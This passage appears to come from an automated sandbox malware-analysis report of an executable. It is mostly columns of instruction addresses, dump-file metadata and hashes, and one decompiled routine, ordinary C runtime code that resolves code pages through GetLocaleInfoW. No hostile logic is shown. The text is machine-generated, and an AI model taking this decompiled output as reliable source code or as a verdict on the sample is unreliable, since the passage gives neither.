                                                                                                                                                                          0x00a105db
                                                                                                                                                                          0x00a105de
                                                                                                                                                                          0x00a105de
                                                                                                                                                                          0x00a105de
                                                                                                                                                                          0x00a105e0
                                                                                                                                                                          0x00a105e0
                                                                                                                                                                          0x00a105e0
                                                                                                                                                                          0x00a108d6
                                                                                                                                                                          0x00a108d6
                                                                                                                                                                          0x00a108d8
                                                                                                                                                                          0x00a109b4
                                                                                                                                                                          0x00a109bb
                                                                                                                                                                          0x00a109c2
                                                                                                                                                                          0x00a109d5
                                                                                                                                                                          0x00a109db
                                                                                                                                                                          0x00a109dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a108de
                                                                                                                                                                          0x00a108e4
                                                                                                                                                                          0x00a108e4
                                                                                                                                                                          0x00a108ea
                                                                                                                                                                          0x00a108ea
                                                                                                                                                                          0x00a108f6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a108f6
                                                                                                                                                                          0x00a1003d
                                                                                                                                                                          0x00a1003d
                                                                                                                                                                          0x00a1003f
                                                                                                                                                                          0x00a10045
                                                                                                                                                                          0x00a10047
                                                                                                                                                                          0x00a1004d
                                                                                                                                                                          0x00a1004f
                                                                                                                                                                          0x00a1042f
                                                                                                                                                                          0x00a1042f
                                                                                                                                                                          0x00a10431
                                                                                                                                                                          0x00a10437
                                                                                                                                                                          0x00a1043e
                                                                                                                                                                          0x00a10444
                                                                                                                                                                          0x00a10446
                                                                                                                                                                          0x00a104aa
                                                                                                                                                                          0x00a104ac
                                                                                                                                                                          0x00a104b2
                                                                                                                                                                          0x00a104b8
                                                                                                                                                                          0x00a104ba
                                                                                                                                                                          0x00a104c0
                                                                                                                                                                          0x00a104c7
                                                                                                                                                                          0x00a104c7
                                                                                                                                                                          0x00a104c9
                                                                                                                                                                          0x00a104c9
                                                                                                                                                                          0x00a104d6
                                                                                                                                                                          0x00a104dd
                                                                                                                                                                          0x00a104e3
                                                                                                                                                                          0x00a104e6
                                                                                                                                                                          0x00a104e7
                                                                                                                                                                          0x00a104ed
                                                                                                                                                                          0x00a104ed
                                                                                                                                                                          0x00a104f1
                                                                                                                                                                          0x00a104f3
                                                                                                                                                                          0x00a104f9
                                                                                                                                                                          0x00a104ff
                                                                                                                                                                          0x00a10502
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10508
                                                                                                                                                                          0x00a10508
                                                                                                                                                                          0x00a1050f
                                                                                                                                                                          0x00a1050f
                                                                                                                                                                          0x00a10502
                                                                                                                                                                          0x00a104f3
                                                                                                                                                                          0x00a104ba
                                                                                                                                                                          0x00a10448
                                                                                                                                                                          0x00a10448
                                                                                                                                                                          0x00a1044a
                                                                                                                                                                          0x00a10450
                                                                                                                                                                          0x00a10456
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10456
                                                                                                                                                                          0x00a10446
                                                                                                                                                                          0x00a10055
                                                                                                                                                                          0x00a10055
                                                                                                                                                                          0x00a10055
                                                                                                                                                                          0x00a10058
                                                                                                                                                                          0x00a1005c
                                                                                                                                                                          0x00a1005c
                                                                                                                                                                          0x00a1005d
                                                                                                                                                                          0x00a1006f
                                                                                                                                                                          0x00a1007c
                                                                                                                                                                          0x00a1008b
                                                                                                                                                                          0x00a100b5
                                                                                                                                                                          0x00a100ba
                                                                                                                                                                          0x00a100c0
                                                                                                                                                                          0x00a100c3
                                                                                                                                                                          0x00a100c5
                                                                                                                                                                          0x00a10197
                                                                                                                                                                          0x00a1019d
                                                                                                                                                                          0x00a10281
                                                                                                                                                                          0x00a10287
                                                                                                                                                                          0x00a1028d
                                                                                                                                                                          0x00a1028d
                                                                                                                                                                          0x00a1028d
                                                                                                                                                                          0x00a10290
                                                                                                                                                                          0x00a10292
                                                                                                                                                                          0x00a10292
                                                                                                                                                                          0x00a10298
                                                                                                                                                                          0x00a1029e
                                                                                                                                                                          0x00a102a4
                                                                                                                                                                          0x00a102a6
                                                                                                                                                                          0x00a102a8
                                                                                                                                                                          0x00a102a8
                                                                                                                                                                          0x00a102ae
                                                                                                                                                                          0x00a102b4
                                                                                                                                                                          0x00a102b6
                                                                                                                                                                          0x00a102c2
                                                                                                                                                                          0x00a102c8
                                                                                                                                                                          0x00a102b8
                                                                                                                                                                          0x00a102b8
                                                                                                                                                                          0x00a102ba
                                                                                                                                                                          0x00a102ba
                                                                                                                                                                          0x00a102ce
                                                                                                                                                                          0x00a102d0
                                                                                                                                                                          0x00a102d2
                                                                                                                                                                          0x00a102d2
                                                                                                                                                                          0x00a102d8
                                                                                                                                                                          0x00a102da
                                                                                                                                                                          0x00a102dc
                                                                                                                                                                          0x00a102e2
                                                                                                                                                                          0x00a102e4
                                                                                                                                                                          0x00a103e5
                                                                                                                                                                          0x00a103e5
                                                                                                                                                                          0x00a103eb
                                                                                                                                                                          0x00a103f0
                                                                                                                                                                          0x00a103f0
                                                                                                                                                                          0x00a103f3
                                                                                                                                                                          0x00a103f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a102ea
                                                                                                                                                                          0x00a102ea
                                                                                                                                                                          0x00a102ea
                                                                                                                                                                          0x00a102ee
                                                                                                                                                                          0x00a1030e
                                                                                                                                                                          0x00a10310
                                                                                                                                                                          0x00a10312
                                                                                                                                                                          0x00a10318
                                                                                                                                                                          0x00a1031e
                                                                                                                                                                          0x00a10320
                                                                                                                                                                          0x00a103c7
                                                                                                                                                                          0x00a103c7
                                                                                                                                                                          0x00a103ca
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a103d0
                                                                                                                                                                          0x00a103d0
                                                                                                                                                                          0x00a103d6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a103d6
                                                                                                                                                                          0x00a10326
                                                                                                                                                                          0x00a10326
                                                                                                                                                                          0x00a10326
                                                                                                                                                                          0x00a10329
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1032b
                                                                                                                                                                          0x00a1032d
                                                                                                                                                                          0x00a10335
                                                                                                                                                                          0x00a1033e
                                                                                                                                                                          0x00a1033e
                                                                                                                                                                          0x00a10340
                                                                                                                                                                          0x00a10340
                                                                                                                                                                          0x00a10352
                                                                                                                                                                          0x00a10355
                                                                                                                                                                          0x00a1035b
                                                                                                                                                                          0x00a10364
                                                                                                                                                                          0x00a10367
                                                                                                                                                                          0x00a10374
                                                                                                                                                                          0x00a10377
                                                                                                                                                                          0x00a10378
                                                                                                                                                                          0x00a10379
                                                                                                                                                                          0x00a1037f
                                                                                                                                                                          0x00a10381
                                                                                                                                                                          0x00a10387
                                                                                                                                                                          0x00a1038d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1038f
                                                                                                                                                                          0x00a1038f
                                                                                                                                                                          0x00a1038f
                                                                                                                                                                          0x00a10391
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10393
                                                                                                                                                                          0x00a10396
                                                                                                                                                                          0x00a10459
                                                                                                                                                                          0x00a10459
                                                                                                                                                                          0x00a1045b
                                                                                                                                                                          0x00a10460
                                                                                                                                                                          0x00a10466
                                                                                                                                                                          0x00a1046c
                                                                                                                                                                          0x00a1046d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1039c
                                                                                                                                                                          0x00a1039c
                                                                                                                                                                          0x00a1039e
                                                                                                                                                                          0x00a103a0
                                                                                                                                                                          0x00a103a0
                                                                                                                                                                          0x00a103a0
                                                                                                                                                                          0x00a103a8
                                                                                                                                                                          0x00a103ab
                                                                                                                                                                          0x00a103ab
                                                                                                                                                                          0x00a103b1
                                                                                                                                                                          0x00a103b3
                                                                                                                                                                          0x00a103b5
                                                                                                                                                                          0x00a103bc
                                                                                                                                                                          0x00a103c2
                                                                                                                                                                          0x00a103c4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a103c4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10396
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1038f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10326
                                                                                                                                                                          0x00a102f0
                                                                                                                                                                          0x00a102f0
                                                                                                                                                                          0x00a102f2
                                                                                                                                                                          0x00a102f8
                                                                                                                                                                          0x00a10300
                                                                                                                                                                          0x00a10300
                                                                                                                                                                          0x00a10303
                                                                                                                                                                          0x00a10303
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a102f2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a103dc
                                                                                                                                                                          0x00a103dc
                                                                                                                                                                          0x00a103dd
                                                                                                                                                                          0x00a103dd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a102ea
                                                                                                                                                                          0x00a101a3
                                                                                                                                                                          0x00a101a9
                                                                                                                                                                          0x00a101ae
                                                                                                                                                                          0x00a101c0
                                                                                                                                                                          0x00a101cf
                                                                                                                                                                          0x00a101d4
                                                                                                                                                                          0x00a101da
                                                                                                                                                                          0x00a101dd
                                                                                                                                                                          0x00a101df
                                                                                                                                                                          0x00a101f9
                                                                                                                                                                          0x00a101fb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10201
                                                                                                                                                                          0x00a10201
                                                                                                                                                                          0x00a10208
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1020e
                                                                                                                                                                          0x00a10214
                                                                                                                                                                          0x00a1021a
                                                                                                                                                                          0x00a1021c
                                                                                                                                                                          0x00a1021c
                                                                                                                                                                          0x00a1021e
                                                                                                                                                                          0x00a1021e
                                                                                                                                                                          0x00a10227
                                                                                                                                                                          0x00a1022e
                                                                                                                                                                          0x00a10234
                                                                                                                                                                          0x00a10237
                                                                                                                                                                          0x00a10238
                                                                                                                                                                          0x00a1023a
                                                                                                                                                                          0x00a1023a
                                                                                                                                                                          0x00a10242
                                                                                                                                                                          0x00a10244
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1024a
                                                                                                                                                                          0x00a1024a
                                                                                                                                                                          0x00a10250
                                                                                                                                                                          0x00a10253
                                                                                                                                                                          0x00a10269
                                                                                                                                                                          0x00a1026f
                                                                                                                                                                          0x00a10275
                                                                                                                                                                          0x00a10276
                                                                                                                                                                          0x00a10473
                                                                                                                                                                          0x00a10473
                                                                                                                                                                          0x00a1047a
                                                                                                                                                                          0x00a1047b
                                                                                                                                                                          0x00a1047c
                                                                                                                                                                          0x00a10481
                                                                                                                                                                          0x00a10484
                                                                                                                                                                          0x00a10255
                                                                                                                                                                          0x00a10255
                                                                                                                                                                          0x00a1025c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1025c
                                                                                                                                                                          0x00a10253
                                                                                                                                                                          0x00a10244
                                                                                                                                                                          0x00a10208
                                                                                                                                                                          0x00a101e1
                                                                                                                                                                          0x00a101e1
                                                                                                                                                                          0x00a101e7
                                                                                                                                                                          0x00a101ed
                                                                                                                                                                          0x00a101ee
                                                                                                                                                                          0x00a103fa
                                                                                                                                                                          0x00a103fa
                                                                                                                                                                          0x00a10401
                                                                                                                                                                          0x00a10402
                                                                                                                                                                          0x00a10403
                                                                                                                                                                          0x00a10408
                                                                                                                                                                          0x00a1040b
                                                                                                                                                                          0x00a1040b
                                                                                                                                                                          0x00a1040b
                                                                                                                                                                          0x00a101df
                                                                                                                                                                          0x00a100cb
                                                                                                                                                                          0x00a100cb
                                                                                                                                                                          0x00a100d1
                                                                                                                                                                          0x00a100d3
                                                                                                                                                                          0x00a1010b
                                                                                                                                                                          0x00a1010d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1010f
                                                                                                                                                                          0x00a1010f
                                                                                                                                                                          0x00a10116
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10118
                                                                                                                                                                          0x00a1011e
                                                                                                                                                                          0x00a10120
                                                                                                                                                                          0x00a10126
                                                                                                                                                                          0x00a10126
                                                                                                                                                                          0x00a10128
                                                                                                                                                                          0x00a10128
                                                                                                                                                                          0x00a1012a
                                                                                                                                                                          0x00a10133
                                                                                                                                                                          0x00a1013a
                                                                                                                                                                          0x00a1013d
                                                                                                                                                                          0x00a1013e
                                                                                                                                                                          0x00a10140
                                                                                                                                                                          0x00a10140
                                                                                                                                                                          0x00a10148
                                                                                                                                                                          0x00a1014a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1014c
                                                                                                                                                                          0x00a1014c
                                                                                                                                                                          0x00a10152
                                                                                                                                                                          0x00a10155
                                                                                                                                                                          0x00a10169
                                                                                                                                                                          0x00a1016f
                                                                                                                                                                          0x00a10188
                                                                                                                                                                          0x00a1018d
                                                                                                                                                                          0x00a10190
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10157
                                                                                                                                                                          0x00a10157
                                                                                                                                                                          0x00a1015e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a1015e
                                                                                                                                                                          0x00a10155
                                                                                                                                                                          0x00a1014a
                                                                                                                                                                          0x00a10116
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a100d5
                                                                                                                                                                          0x00a100d5
                                                                                                                                                                          0x00a100d8
                                                                                                                                                                          0x00a100de
                                                                                                                                                                          0x00a100f7
                                                                                                                                                                          0x00a100fc
                                                                                                                                                                          0x00a100ff
                                                                                                                                                                          0x00a100ff
                                                                                                                                                                          0x00a100ff
                                                                                                                                                                          0x00a10101
                                                                                                                                                                          0x00a10101
                                                                                                                                                                          0x00a10101
                                                                                                                                                                          0x00a1040d
                                                                                                                                                                          0x00a1040d
                                                                                                                                                                          0x00a1040f
                                                                                                                                                                          0x00a10488
                                                                                                                                                                          0x00a1048f
                                                                                                                                                                          0x00a1048f
                                                                                                                                                                          0x00a1048f
                                                                                                                                                                          0x00a10496
                                                                                                                                                                          0x00a10498
                                                                                                                                                                          0x00a1049e
                                                                                                                                                                          0x00a1049f
                                                                                                                                                                          0x00a109e2
                                                                                                                                                                          0x00a109e2
                                                                                                                                                                          0x00a109e3
                                                                                                                                                                          0x00a109e4
                                                                                                                                                                          0x00a109e9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10411
                                                                                                                                                                          0x00a10417
                                                                                                                                                                          0x00a10417
                                                                                                                                                                          0x00a1041d
                                                                                                                                                                          0x00a1041d
                                                                                                                                                                          0x00a10429
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10429
                                                                                                                                                                          0x00a1004f
                                                                                                                                                                          0x00a109ec
                                                                                                                                                                          0x00a109ec
                                                                                                                                                                          0x00a109f2
                                                                                                                                                                          0x00a109f8
                                                                                                                                                                          0x00a109fe
                                                                                                                                                                          0x00a10a00
                                                                                                                                                                          0x00a10a02
                                                                                                                                                                          0x00a10a09
                                                                                                                                                                          0x00a10a09
                                                                                                                                                                          0x00a10a0b
                                                                                                                                                                          0x00a10a0b
                                                                                                                                                                          0x00a10a14
                                                                                                                                                                          0x00a10a15
                                                                                                                                                                          0x00a10a1d
                                                                                                                                                                          0x00a10a24
                                                                                                                                                                          0x00a10a27
                                                                                                                                                                          0x00a10a28
                                                                                                                                                                          0x00a10a2e
                                                                                                                                                                          0x00a10a2e
                                                                                                                                                                          0x00a10a32
                                                                                                                                                                          0x00a10a38
                                                                                                                                                                          0x00a10a3a
                                                                                                                                                                          0x00a10a3c
                                                                                                                                                                          0x00a10a42
                                                                                                                                                                          0x00a10a45
                                                                                                                                                                          0x00a10a56
                                                                                                                                                                          0x00a10a59
                                                                                                                                                                          0x00a10a5f
                                                                                                                                                                          0x00a10a74
                                                                                                                                                                          0x00a10a79
                                                                                                                                                                          0x00a10a47
                                                                                                                                                                          0x00a10a47
                                                                                                                                                                          0x00a10a4e
                                                                                                                                                                          0x00a10a4e
                                                                                                                                                                          0x00a10a45
                                                                                                                                                                          0x00a10a3a
                                                                                                                                                                          0x00a10a8a
                                                                                                                                                                          0x00a10a91
                                                                                                                                                                          0x00a10a99
                                                                                                                                                                          0x00a10a9a
                                                                                                                                                                          0x00a10a9c
                                                                                                                                                                          0x00a10be8
                                                                                                                                                                          0x00a10bea
                                                                                                                                                                          0x00a10bfa
                                                                                                                                                                          0x00a10bfd
                                                                                                                                                                          0x00a10bff
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10bec
                                                                                                                                                                          0x00a10bf2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10bf2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10aa2
                                                                                                                                                                          0x00a10aa2
                                                                                                                                                                          0x00a10aa8
                                                                                                                                                                          0x00a10aab
                                                                                                                                                                          0x00a10ab1
                                                                                                                                                                          0x00a10ab4
                                                                                                                                                                          0x00a10aba
                                                                                                                                                                          0x00a10ac0
                                                                                                                                                                          0x00a10ac2
                                                                                                                                                                          0x00a10ac4
                                                                                                                                                                          0x00a10ac6
                                                                                                                                                                          0x00a10ac6
                                                                                                                                                                          0x00a10ac8
                                                                                                                                                                          0x00a10ac8
                                                                                                                                                                          0x00a10ad5
                                                                                                                                                                          0x00a10adc
                                                                                                                                                                          0x00a10adf
                                                                                                                                                                          0x00a10ae0
                                                                                                                                                                          0x00a10ae2
                                                                                                                                                                          0x00a10ae3
                                                                                                                                                                          0x00a10ae3
                                                                                                                                                                          0x00a10aeb
                                                                                                                                                                          0x00a10af1
                                                                                                                                                                          0x00a10af3
                                                                                                                                                                          0x00a10af9
                                                                                                                                                                          0x00a10afb
                                                                                                                                                                          0x00a10b01
                                                                                                                                                                          0x00a10b04
                                                                                                                                                                          0x00a10bc0
                                                                                                                                                                          0x00a10bc6
                                                                                                                                                                          0x00a10bdb
                                                                                                                                                                          0x00a10be0
                                                                                                                                                                          0x00a10b0a
                                                                                                                                                                          0x00a10b10
                                                                                                                                                                          0x00a10b17
                                                                                                                                                                          0x00a10b17
                                                                                                                                                                          0x00a10b17
                                                                                                                                                                          0x00a10b17
                                                                                                                                                                          0x00a10b04
                                                                                                                                                                          0x00a10b1d
                                                                                                                                                                          0x00a10b1d
                                                                                                                                                                          0x00a10b23
                                                                                                                                                                          0x00a10b23
                                                                                                                                                                          0x00a10b23
                                                                                                                                                                          0x00a10b29
                                                                                                                                                                          0x00a10b2f
                                                                                                                                                                          0x00a10b32
                                                                                                                                                                          0x00a10b38
                                                                                                                                                                          0x00a10b3a
                                                                                                                                                                          0x00a10b3c
                                                                                                                                                                          0x00a10b42
                                                                                                                                                                          0x00a10b44
                                                                                                                                                                          0x00a10b44
                                                                                                                                                                          0x00a10b44
                                                                                                                                                                          0x00a10b42
                                                                                                                                                                          0x00a10b49
                                                                                                                                                                          0x00a10b4a
                                                                                                                                                                          0x00a10b4c
                                                                                                                                                                          0x00a10b4e
                                                                                                                                                                          0x00a10b4e
                                                                                                                                                                          0x00a10b50
                                                                                                                                                                          0x00a10b52
                                                                                                                                                                          0x00a10b58
                                                                                                                                                                          0x00a10b5a
                                                                                                                                                                          0x00a10b60
                                                                                                                                                                          0x00a10b60
                                                                                                                                                                          0x00a10b66
                                                                                                                                                                          0x00a10b68
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10b6e
                                                                                                                                                                          0x00a10b70
                                                                                                                                                                          0x00a10b72
                                                                                                                                                                          0x00a10b72
                                                                                                                                                                          0x00a10b74
                                                                                                                                                                          0x00a10b74
                                                                                                                                                                          0x00a10b84
                                                                                                                                                                          0x00a10b8b
                                                                                                                                                                          0x00a10b8e
                                                                                                                                                                          0x00a10b8f
                                                                                                                                                                          0x00a10b91
                                                                                                                                                                          0x00a10b91
                                                                                                                                                                          0x00a10b95
                                                                                                                                                                          0x00a10b9b
                                                                                                                                                                          0x00a10b9d
                                                                                                                                                                          0x00a10ba3
                                                                                                                                                                          0x00a10ba9
                                                                                                                                                                          0x00a10bac
                                                                                                                                                                          0x00a10c0a
                                                                                                                                                                          0x00a10c0d
                                                                                                                                                                          0x00a10c13
                                                                                                                                                                          0x00a10c28
                                                                                                                                                                          0x00a10c2d
                                                                                                                                                                          0x00a10bae
                                                                                                                                                                          0x00a10bae
                                                                                                                                                                          0x00a10bb5
                                                                                                                                                                          0x00a10bb5
                                                                                                                                                                          0x00a10bac
                                                                                                                                                                          0x00a10c3e
                                                                                                                                                                          0x00a10c43
                                                                                                                                                                          0x00a10c52
                                                                                                                                                                          0x00a10c55
                                                                                                                                                                          0x00a10c5f
                                                                                                                                                                          0x00a10c5f
                                                                                                                                                                          0x00a10c61
                                                                                                                                                                          0x00a10c63
                                                                                                                                                                          0x00a10c69
                                                                                                                                                                          0x00a10c71
                                                                                                                                                                          0x00a10c77
                                                                                                                                                                          0x00a10c79
                                                                                                                                                                          0x00a10c7f
                                                                                                                                                                          0x00a10c81
                                                                                                                                                                          0x00a10c8e
                                                                                                                                                                          0x00a10c83
                                                                                                                                                                          0x00a10c83
                                                                                                                                                                          0x00a10c8a
                                                                                                                                                                          0x00a10c8a
                                                                                                                                                                          0x00a10c91
                                                                                                                                                                          0x00a10c97
                                                                                                                                                                          0x00a10c98
                                                                                                                                                                          0x00a10c9e
                                                                                                                                                                          0x00a10c9e
                                                                                                                                                                          0x00a10ca3
                                                                                                                                                                          0x00a10ca6
                                                                                                                                                                          0x00a10caa
                                                                                                                                                                          0x00a10caa
                                                                                                                                                                          0x00a10cab
                                                                                                                                                                          0x00a10cad
                                                                                                                                                                          0x00a10cb3
                                                                                                                                                                          0x00a10cb9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10cb9
                                                                                                                                                                          0x00a10b60
                                                                                                                                                                          0x00a10cbf
                                                                                                                                                                          0x00a10cc1
                                                                                                                                                                          0x00a10cc4
                                                                                                                                                                          0x00a10cc6
                                                                                                                                                                          0x00a10cc9
                                                                                                                                                                          0x00a10ccf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10ccf
                                                                                                                                                                          0x00a0f965
                                                                                                                                                                          0x00a0f95c
                                                                                                                                                                          0x00a0f953
                                                                                                                                                                          0x00a0f8e8
                                                                                                                                                                          0x00a0f8ed
                                                                                                                                                                          0x00a0f8f5
                                                                                                                                                                          0x00a0f909
                                                                                                                                                                          0x00a0f90e
                                                                                                                                                                          0x00a0f912
                                                                                                                                                                          0x00a0f912
                                                                                                                                                                          0x00a0f915
                                                                                                                                                                          0x00a0f925
                                                                                                                                                                          0x00a10d34
                                                                                                                                                                          0x00a10d36
                                                                                                                                                                          0x00a10d37
                                                                                                                                                                          0x00a10d38
                                                                                                                                                                          0x00a10d39
                                                                                                                                                                          0x00a10d3a
                                                                                                                                                                          0x00a10d3b
                                                                                                                                                                          0x00a10d40
                                                                                                                                                                          0x00a10d43
                                                                                                                                                                          0x00a10d46
                                                                                                                                                                          0x00a10d49
                                                                                                                                                                          0x00a10d4c
                                                                                                                                                                          0x00a10d5b
                                                                                                                                                                          0x00a10d5d
                                                                                                                                                                          0x00a10d83
                                                                                                                                                                          0x00a10d88
                                                                                                                                                                          0x00a10d8e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10d5f
                                                                                                                                                                          0x00a10d5f
                                                                                                                                                                          0x00a10d65
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10d67
                                                                                                                                                                          0x00a10d7e
                                                                                                                                                                          0x00a10d7e
                                                                                                                                                                          0x00a10d82
                                                                                                                                                                          0x00a10d82
                                                                                                                                                                          0x00a10d65
                                                                                                                                                                          0x00a10d4e
                                                                                                                                                                          0x00a10d53
                                                                                                                                                                          0x00a10d93
                                                                                                                                                                          0x00a10d93
                                                                                                                                                                          0x00a10d96
                                                                                                                                                                          0x00a10d96
                                                                                                                                                                          0x00a0f92b
                                                                                                                                                                          0x00a10d0d
                                                                                                                                                                          0x00a10d0d
                                                                                                                                                                          0x00a10d14
                                                                                                                                                                          0x00a10d15
                                                                                                                                                                          0x00a10d16
                                                                                                                                                                          0x00a10d1f
                                                                                                                                                                          0x00a10d24
                                                                                                                                                                          0x00a10d2c
                                                                                                                                                                          0x00a10d33
                                                                                                                                                                          0x00a10d33
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0f8f5

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                          • Opcode ID: 36b924f89614afd86108a561baf59f6dcd07814f0341616d713fdd74b2a9cd3d
                                                                                                                                                                          • Instruction ID: 97e077107c6ceca97bdf0d1a8df672e054674764e4cf3e2b844c6ce20c015796
                                                                                                                                                                          • Opcode Fuzzy Hash: 36b924f89614afd86108a561baf59f6dcd07814f0341616d713fdd74b2a9cd3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 75D21871E082298FDB65CF28DD40BEAB7B5EB88345F1441EAD44DE6280E774AEC18F41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0EA99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                          			E00A0EA99(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00A03DB9(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                                                                                                                                                          0x00a0ea9e
                                                                                                                                                                          0x00a0ea9f
                                                                                                                                                                          0x00a0eaa6
                                                                                                                                                                          0x00a0eb4a
                                                                                                                                                                          0x00a0eb63
                                                                                                                                                                          0x00a0eb69
                                                                                                                                                                          0x00a0eb6e
                                                                                                                                                                          0x00a0eb70
                                                                                                                                                                          0x00a0eb70
                                                                                                                                                                          0x00a0eb76
                                                                                                                                                                          0x00a0eb79
                                                                                                                                                                          0x00a0eb79
                                                                                                                                                                          0x00a0eb65
                                                                                                                                                                          0x00a0eb65
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eb65
                                                                                                                                                                          0x00a0eaac
                                                                                                                                                                          0x00a0eab1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0eab7
                                                                                                                                                                          0x00a0eabc
                                                                                                                                                                          0x00a0eabe
                                                                                                                                                                          0x00a0eabe
                                                                                                                                                                          0x00a0eac4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
